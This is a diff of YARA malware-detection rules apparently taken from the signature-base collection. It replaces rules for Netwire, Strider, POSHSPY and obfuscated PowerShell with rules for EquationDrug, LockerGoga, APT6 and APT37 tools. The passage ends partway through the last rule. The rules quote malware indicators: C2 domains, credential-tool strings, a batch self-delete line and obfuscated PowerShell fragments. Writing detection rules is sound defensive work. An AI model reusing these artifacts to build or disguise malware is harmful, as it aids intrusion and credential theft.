+		$s0 = "\\registry\\machine\\software\\Microsoft\\Windows NT\\CurrentVersion" wide
+		$s2 = "\\registry\\machine\\SYSTEM\\ControlSet001\\Control\\Session Manager\\En" wide
+		$s3 = "\\DosDevices\\Gk" wide
+		$s5 = "\\Device\\Gk0" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 700KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Suspicious_BAT_Strings : FILE
+rule SIGNATURE_BASE_Equationdrug_Platformorchestrator
 {
 	meta:
-		description = "Detects a string also used in Netwire RAT auxilliary"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fe28555-96c8-54da-b047-7d0a7532a6d2"
-		date = "2018-01-05"
-		modified = "2023-12-05"
-		reference = "https://pastebin.com/8qaiyPxs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_netwire_rat.yar#L32-L45"
+		description = "EquationDrug - Platform orchestrator - mscfg32.dll, svchost32.dll"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "ce19ed3c-9dd9-5cb0-99fe-c04fde057293"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L538-L555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e643a5ef41d084e1b1a20be2c56328b72fedddbbce3c79d1e93cc8cfaa633e12"
-		score = 60
+		hash = "febc4f30786db7804008dc9bc1cebdc26993e240"
+		logic_hash = "26c3b84a00702f155daa50c8f17e5f37e1aac46adde8a06a711e732a4cd806e9"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "ping 192.0.2.2 -n 1" ascii
+		$s0 = "SERVICES.EXE" fullword wide
+		$s1 = "\\command.com" wide
+		$s2 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s3 = "LSASS.EXE" fullword wide
+		$s4 = "Windows Configuration Services" fullword wide
+		$s8 = "unilay.dll" fullword ascii
 
 	condition:
-		filesize < 600KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Malicious_BAT_Strings : FILE
+rule SIGNATURE_BASE_Equationdrug_Networksniffer5
 {
 	meta:
-		description = "Detects a string also used in Netwire RAT auxilliary"
+		description = "EquationDrug - Network-sniffer/patcher - atmdkdrv.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6e197d05-62eb-535d-8cd6-db8550e51588"
-		date = "2018-01-05"
-		modified = "2023-12-05"
-		reference = "https://pastebin.com/8qaiyPxs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_netwire_rat.yar#L47-L60"
+		id = "9eac2c51-3ad7-5346-a985-39733bc204c2"
+		date = "2015-03-11"
+		modified = "2023-01-06"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L557-L575"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f39b3fd11e7450eb1eaddeeca60aa4970568efda6053029f85df42e2f9fdd6e"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "09399b9bd600d4516db37307a457bc55eedcbd17"
+		logic_hash = "84f009e2ef639e5270273a7d9dd2542fdf1386c4c8363071d711e2333a112cd1"
+		score = 75
+		quality = 60
+		tags = ""
 
 	strings:
-		$s1 = "call :deleteSelf&exit /b"
+		$s0 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s2 = "atmdkdrv.sys" fullword wide
+		$s4 = "\\Device\\%ws_%ws" wide
+		$s5 = "\\DosDevices\\%ws" wide
+		$s6 = "\\Device\\%ws" wide
 
 	condition:
-		filesize < 600KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Remsec_Executable_Blob_32
+rule SIGNATURE_BASE_Equationdrug_Filesystem_Filter
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "d7a7e57a-b117-5da8-a7a2-4c6351bd9072"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L8-L20"
+		description = "EquationDrug - Filesystem filter driver - volrec.sys, scsi2mgr.sys"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "7077daf6-3d51-5ff2-bc74-95cb169a7cd2"
+		date = "2015-03-11"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L577-L591"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1cfc43ab15b3d220a636c150315c30f5654e53fad67d20534ce4d5c00295e35e"
-		score = 80
+		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
+		logic_hash = "5da0c279da1b84a41e7d15df3c19cd50af1872156f133de0a367b9140425aa11"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$code = { 31 06 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 F0 }
+		$s0 = "volrec.sys" fullword wide
+		$s1 = "volrec.pdb" fullword ascii
+		$s2 = "Volume recognizer driver" fullword wide
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Remsec_Executable_Blob_64
+rule SIGNATURE_BASE_Apt_Equation_Keyword : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "22345f40-3dae-5d5b-acc6-c67394475636"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L22-L34"
+		description = "Rule to detect Equation group's keyword in executable file"
+		author = "Florian Roth"
+		id = "a7d4eda5-f390-5099-9c46-bf74a878b4f0"
+		date = "2015-09-26"
+		modified = "2025-03-29"
+		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L593-L604"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "957e5b6afabec3fb1b169dd85d0e950107e219f7dec8ef779a18bd90d9824a97"
-		score = 80
+		logic_hash = "d9a2b31d078eabbc930e9ec06e5ead5a6cda4eebf1c0ebe8164caf75a9d3cba6"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$code = { 31 06 48 83 C6 04 D1 E8 73 05 35 01 00 00 D0 E2 EF }
+		$a1 = "Backsnarf_AB25" wide
+		$a2 = "Backsnarf_AB25" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $a* )
 }
-rule SIGNATURE_BASE_Remsec_Executable_Blob_Parser
+rule SIGNATURE_BASE_Ransom_Lockergoga_Mar19_1 : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "b2189bfe-7b84-5fe9-8829-64f49d1e2030"
-		date = "2016-08-08"
+		description = "Detects LockerGoga ransomware binaries"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ba5836b9-bc47-54d4-8f7a-475ba0feaac6"
+		date = "2019-03-19"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L36-L48"
+		reference = "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_lockergoga.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2f6db962807c07ff1bbe8b53eeb386d7b0ac88f95b76439c0d8b65d597739bdd"
-		score = 80
+		logic_hash = "076d799113f5bf6c00aa29895cca83ff86e89706cf15ca6971a991d345d0ad65"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "c97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15"
+		hash2 = "7bcd69b3085126f7e97406889f78ab74e87230c11812b79406d723a80c08dd26"
+		hash3 = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f"
 
 	strings:
-		$code = { ( 0F 82 ?? ?? 00 00 | 72 ?? ) ( 80 | 41 80 ) ( 7? | 7C 24 ) 04 02 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 81 | 41 81 ) ( 3? | 3C 24 | 7D 00 ) 02 AA 02 C1 ( 0F 85 ?? ?? 00 00 | 75 ?? ) ( 8B | 41 8B | 44 8B | 45 8B ) ( 4? | 5? | 6? | 7? | ?4 24 | ?C 24 ) 06 }
+		$x1 = "\\.(doc|dot|wbk|docx|dotx|docb|xlm|xlsx|xltx|xlsb|xlw|ppt|pot|pps|pptx|potx|ppsx|sldx|pdf)" wide
+		$x2 = "|[A-Za-z]:\\cl.log" wide
+		$x4 = "\\crypto-locker\\" ascii
+		$xc1 = { 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E
+               00 61 00 6D 00 65 00 00 00 00 00 4D 00 6C 00 63
+               00 72 00 6F 00 73 00 6F 00 66 00 74 }
+		$xc2 = { 00 2E 00 6C 00 6F 00 63 00 6B 00 65 00 64 00 00
+               00 20 46 41 49 4C 45 44 20 00 00 00 00 20 00 00
+               00 20 75 6E 6B 6E 6F 77 6E 20 65 78 63 65 70 74
+               69 6F 6E }
+		$rn1 = "This may lead to the impossibility of recovery of the certain files." wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) ) or $rn1
 }
-rule SIGNATURE_BASE_Remsec_Encrypted_Api
+rule SIGNATURE_BASE_APT6_Malware_Sample_Gen : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "1aa3380b-d704-5eb9-b25d-f4bf20ae7179"
-		date = "2016-08-08"
-		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L50-L62"
+		description = "Rule written for 2 malware samples that communicated to APT6 C2 servers"
+		author = "Florian Roth (Nextron Systems)"
+		id = "142d2714-f7bf-5725-bf7e-9497be7ed234"
+		date = "2016-04-09"
+		modified = "2023-01-06"
+		reference = "https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt6_malware.yar#L8-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4f10c24a8480c17c2939fe3fecba2820b22f8a47bc2b2e73ac1080a355025d7c"
+		logic_hash = "614a6673579630fc254d3c546161647e619df5a03ee6f21434d6cc50be1ed187"
 		score = 80
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		hash1 = "321ec239bfa6927d39155ef5f10741ed786219489bbbb1dc8fee66e22f9f8e80"
+		hash2 = "7aef130b19d1f940e4c4cee6efe0f190f1402d2e0f741ee605c77518a04cb6d7"
 
 	strings:
-		$open_process = { 91 9A 8F B0 9C 90 8D AF 8C 8C 9A FF }
+		$x2 = "SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>!" fullword ascii
+		$x3 = "636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146" fullword ascii
+		$s1 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
+		$s2 = "DUMPTHIN" fullword ascii
+		$s3 = "\"C:\\WINDOWS\\system32\\" ascii
+		$s4 = "window.eval(f.decodeURIComponent(a));" fullword ascii
+		$s5 = "/tbedrs.dll" fullword ascii
+		$s6 = "NSISDL/1.2 (Mozilla)" fullword ascii
+		$s7 = "NSIS_Inetc (Mozilla)" fullword ascii
+		$s8 = "/logos.gif" fullword ascii
+		$s9 = "synflood" fullword ascii
+		$s10 = "IconFile=C:\\WINDOWS\\system32\\SHELL32.dll" fullword ascii
+		$s11 = "udpflood" fullword ascii
+		$s12 = "shellcode" fullword ascii
+		$s13 = "&PassWord=" fullword ascii
+		$s14 = "SystemPropertiesProtection.exe" fullword ascii
+		$s15 = "SystemPropertiesRemote.exe" fullword ascii
+		$c1 = "jobcall.org" ascii
+		$c2 = "sportsinfinite.com" ascii
+		$c3 = "milsatcom.us" ascii
+		$c4 = "geographicphotographer.com" ascii
+		$c5 = "snowsmooth.com" ascii
+		$c6 = "goodre.net" ascii
+		$c7 = "gloflabs.com" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 1 of ( $c* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Remsec_Packer_A
+rule SIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1 : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "d75198ab-b1ea-572a-a674-9a38c3e2958b"
-		date = "2016-08-08"
+		description = "Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9ecca7d9-3b63-5615-a223-5efa1c53510e"
+		date = "2022-06-10"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L64-L76"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_ps_jab.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b46a41686fbf1c63e8a8b583859f23bf789bc9f11ee6b1fb01bb08e602772e76"
-		score = 80
+		logic_hash = "9ad61dca5c945ed87642668e3b834b12c813af244437903a5abb5c69459b9456"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$code = { 69 ( C? | D? | E? | F? ) AB 00 00 00 ( 81 | 41 81 ) C? CD 2B 00 00 ( F7 | 41 F7 ) E? ( C1 | 41 C1 ) E? 0D ( 69 | 45 69 ) ( C? | D? | E? | F? ) 85 CF 00 00 ( 29 | 41 29 | 44 29 | 45 29 | 2B | 41 2B | 44 2B | 45 2B ) }
+		$xc1 = { 4a 41 42 ?? 41 43 41 41 50 51 41 67 41 }
+		$xc2 = { 4a 00 41 00 42 00 ?? 00 41 00 43 00 41 00 41 00 50 00 51 00 41 00 67 00 41 }
+		$xc3 = { 4a 41 42 ?? 41 44 30 41 }
+		$xc4 = { 4a 00 41 00 42 00 ?? 00 41 00 44 00 30 00 41 }
 
 	condition:
-		all of them
+		filesize < 30MB and 1 of them
 }
-rule SIGNATURE_BASE_Remsec_Packer_B
+rule SIGNATURE_BASE_Lightftp_Fftp_X86_64 : FILE
 {
 	meta:
-		description = "Detects malware from Symantec's Strider APT report"
-		author = "Symantec"
-		id = "18e7f84e-27f2-532d-9ead-0db6e9e6c0b2"
-		date = "2016-08-08"
+		description = "Detects a light FTP server"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9b62e990-1d8b-5d30-bb58-1f7f12552834"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_strider.yara#L78-L90"
+		reference = "https://github.com/hfiref0x/LightFTP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pup_lightftp.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9c63b5934d60b59a33364ef56c913220e59b9798a682a7f97e6755270adf4e4b"
-		score = 80
+		logic_hash = "f29a98a4014fc6c026aef4054bc2bee7bde2e9ad7f26f2368fdf0949f50847bb"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "989525f85abef05581ccab673e81df3f5d50be36"
+		hash2 = "5884aeca33429830b39eba6d3ddb00680037faf4"
 
 	strings:
-		$code = { 48 8B 05 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) ( 44 88 6? 24 ?? | C6 44 24 ?? 00 ) 48 89 44 24 ?? 48 8D ( 45 ?? | 84 24 ?? ?? 00 00 ) C7 44 24 ?? 0? 00 00 00 2B ?8 48 89 ?C 24 ?? 44 89 6? 24 ?? 83 C? 08 89 ?C 24 ?? ( FF | 41 FF ) D? ( 05 | 8D 88 ) 00 00 00 3A }
+		$s1 = "fftp.cfg" fullword wide
+		$s2 = "220 LightFTP server v1.0 ready" fullword ascii
+		$s3 = "*FTP thread exit*" fullword wide
+		$s4 = "PASS->logon successful" fullword ascii
+		$s5 = "250 Requested file action okay, completed." fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and 4 of them
 }
-rule SIGNATURE_BASE_Powershell_Isesteroids_Obfuscation
+rule SIGNATURE_BASE_Lightftp_Config : FILE
 {
 	meta:
-		description = "Detects PowerShell ISESteroids obfuscation"
+		description = "Detects a light FTP server - config file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d686c4de-28fd-5d77-91d4-dde5661b75cd"
-		date = "2017-06-23"
-		modified = "2025-02-12"
-		reference = "https://twitter.com/danielhbohannon/status/877953970437844993"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_obfuscation.yar#L11-L26"
+		id = "02ee1d04-1425-5dfd-9b9a-cd378aeda311"
+		date = "2015-05-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/hfiref0x/LightFTP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pup_lightftp.yar#L23-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d9476f679614e34a0d13664baffd15b0bdb896f7eeca2c9de66bdc0d65a2eec"
+		hash = "ce9821213538d39775af4a48550eefa3908323c5"
+		logic_hash = "1e8c06dac9a5910816703ed15bef83116d9e2d9e612fda69697170ed98ee5f60"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/\\/===\\__" ascii
-		$x2 = "${__/\\/==" ascii
-		$x3 = "Catch { }" fullword ascii
-		$x4 = "\\_/=} ${_" ascii
+		$s2 = "maxusers=" wide
+		$s6 = "[ftpconfig]" fullword wide
+		$s8 = "accs=readonly" fullword wide
+		$s9 = "[anonymous]" fullword wide
+		$s10 = "accs=" fullword wide
+		$s11 = "pswd=" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0xfeff and filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Obfuscted_Powershell_Code
+rule SIGNATURE_BASE_Hvs_APT37_Smb_Scanner : FILE
 {
 	meta:
-		description = "Detects obfuscated PowerShell Code"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e2d8fc9e-ce2b-5118-8305-0d5839561d4f"
-		date = "2018-12-13"
-		modified = "2025-02-12"
-		reference = "https://twitter.com/silv0123/status/1073072691584880640"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_obfuscation.yar#L28-L41"
+		description = "Unknown smb login scanner used by APT37"
+		author = "Marc Stroebel"
+		id = "89a5cc32-f151-583d-823d-692de2c2b084"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hybrid-analysis.com/sample/d16163526242508d6961f061aaffe3ae5321bd64d8ceb6b2788f1570757595fc?environmentId=2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "afd7e4b88c812b23441549565a18fde18c24fe91ec467455002ef338e092ebf9"
-		score = 65
+		logic_hash = "0bea71db7052f1c22c01cfbf710d4ed24651cbbd8b0fd29f09dfd49c4e314028"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "').Invoke(" ascii
-		$s2 = "(\"{1}{0}\"" ascii
-		$s3 = "{0}\" -f" ascii
+		$s1 = "Scan.exe StartIP EndIP ThreadCount logfilePath [Username Password Deep]" fullword ascii
+		$s2 = "%s - %s:(Username - %s / Password - %s" fullword ascii
+		$s3 = "Load mpr.dll Error " fullword ascii
+		$s4 = "Load Netapi32.dll Error " fullword ascii
+		$s5 = "%s U/P not Correct! - %d" fullword ascii
+		$s6 = "GetNetWorkInfo Version 1.0" fullword wide
+		$s7 = "Hello World!" fullword wide
+		$s8 = "%s Error: %ld" fullword ascii
+		$s9 = "%s U/P Correct!" fullword ascii
+		$s10 = "%s --------" fullword ascii
+		$s11 = "%s%-30s%I64d" fullword ascii
+		$s12 = "%s%-30s(DIR)" fullword ascii
+		$s13 = "%04d-%02d-%02d %02d:%02d" fullword ascii
+		$s14 = "Share:              Local Path:                   Uses:   Descriptor:" fullword ascii
+		$s15 = "Share:              Type:                   Remark:" fullword ascii
 
 	condition:
-		#s1> 11 and #s2 > 10 and #s3 > 10
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 10 of them )
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_Powershell_True_Jun20_1 : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Cred_Tool : FILE
 {
 	meta:
-		description = "Detects indicators often found in obfuscated PowerShell scripts. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
-		author = "Florian Roth (Nextron Systems)"
-		id = "e9bb870b-ad72-57d3-beff-2f84a81490eb"
-		date = "2020-06-27"
-		modified = "2025-02-12"
-		reference = "https://github.com/corneacristian/mimikatz-bypass/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_obfuscation.yar#L57-L75"
+		description = "Unknown cred tool used by APT37"
+		author = "Markus Poelloth"
+		id = "e830025a-f2ac-55b1-aca3-ded9dba83a67"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L31-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8f33762e6e93fcf6b423b34eb1abefae2ae91b51048303947f7c1601823630d7"
+		logic_hash = "4fb7247b88f2d252e7c9d5034c209945bc9e17f49de3dcdb5bf50b5afb302987"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "${t`rue}" ascii nocase
-		$ = "${tr`ue}" ascii nocase
-		$ = "${tru`e}" ascii nocase
-		$ = "${t`ru`e}" ascii nocase
-		$ = "${tr`u`e}" ascii nocase
-		$ = "${t`r`ue}" ascii nocase
-		$ = "${t`r`u`e}" ascii nocase
+		$s1 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>" fullword ascii
+		$s2 = "Domain Login" fullword ascii
+		$s3 = "IEShims_GetOriginatingThreadContext" fullword ascii
+		$s4 = " Type Descriptor'" fullword ascii
+		$s5 = "User: %s" fullword ascii
+		$s6 = "Pass: %s" fullword ascii
+		$s7 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
+		$s8 = "E@c:\\u" fullword ascii
 
 	condition:
-		filesize < 6000KB and 1 of them
+		filesize < 500KB and 7 of them
 }
-rule SIGNATURE_BASE_POSHSPY_Malware
+
+rule SIGNATURE_BASE_Hvs_APT37_RAT_Loader
 {
 	meta:
-		description = "Detects"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7e908efc-0023-5be1-9871-8bfbf8b9e53a"
-		date = "2017-07-15"
+		description = "BLINDINGCAN RAT loader named iconcash.db used by APT37"
+		author = "Marc Stroebel"
+		id = "6c3e8465-d607-59bf-85fc-5abbef71fb1c"
+		date = "2020-12-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poshspy.yar#L11-L28"
+		reference = "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L52-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e1f8b502950d2f7600041b5492f529682b9f5f2863c36ad40618b5ed78a94567"
+		hash = "b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9"
+		logic_hash = "241f2683adc29e8aca30ae24278f3703fef0fed6b276dae488fdb32c167af1c9"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	strings:
-		$x1 = "function sWP($cN, $pN, $aK, $aI)" fullword ascii
-		$x2 = "$aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2" ascii
-		$x3 = "(('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',"
-		$x4 = "$cPairKey = \"BwIAAACkAABSU0EyAAQAAAEAA"
-		$x5 = "$exeRes = exePldRoutine"
-		$x6 = "ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA"
-
 	condition:
-		1 of them
+		(pe.version_info [ "OriginalFilename" ] contains "MFC_DLL.dll" ) and ( pe.exports ( "SMain" ) and pe.exports ( "SMainW" ) )
 }
-rule SIGNATURE_BASE_Hawkeye_Keylogger_Feb18_1 : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Webshell_Img_Thumbs_Asp : FILE
 {
 	meta:
-		description = "Semiautomatically generated YARA rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6b4b447f-43d6-5774-a1b9-d53b40364732"
-		date = "2018-02-12"
-		modified = "2023-01-06"
-		reference = "https://app.any.run/tasks/ae2521dd-61aa-4bc7-b0d8-8c85ddcbfcc9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hawkeye.yar#L2-L18"
+		description = "Webshell named img.asp, thumbs.asp or thumb.asp used by APT37"
+		author = "Moritz Oettle"
+		id = "e45d4507-81de-5f72-9ce2-4f0e3e5c62b1"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_dec20.yar#L68-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
